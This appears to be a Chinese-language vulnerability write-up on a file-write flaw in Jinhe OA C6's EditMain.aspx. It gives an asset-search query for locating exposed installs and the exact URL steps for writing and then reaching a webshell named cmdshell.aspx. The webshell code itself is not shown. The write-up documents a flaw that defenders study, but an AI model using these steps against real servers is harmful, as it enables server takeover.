金和OA C6 EditMain.aspx 后台文件写入漏洞

漏洞描述

金和OA C6 EditMain.aspx 存在任意文件写入漏洞,通过漏洞可以写入恶意文件获取服务器权限。

漏洞影响

金和OA C6

网络测绘

app=”金和网络-金和OA”

漏洞复现

漏洞触发需要后台权限

20240311143549349-1628350407372-c8b8b96e-c7cd-47e3-acee-90bb3d055866.28d86a38_2024-03-11_14-35-24

访问漏洞点 /C6/JHSoft.Web.Portal/EditMain.aspx?id=cmdshell.aspx

20240311143927421-1628350462105-61aa0f6b-0712-4f8b-87c2-c8a5cbf279e2.f4769731_2024-03-11_14-38-02 (1)

写入webshell代码保存

20240311144055794-1628350735733-a56b0cd0-92ff-4e1f-90bb-e602b3fec72d.b45333d2_2024-03-11_14-40-11 (1)

再访问 /C6/JHSoft.Web.Portal/Default/cmdshell.aspx

20240311144243404-1628350972563-90ebac52-7c40-4b32-ad3a-e1ea2927b071.8fed0c6a_2024-03-11_14-42-06 (1)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容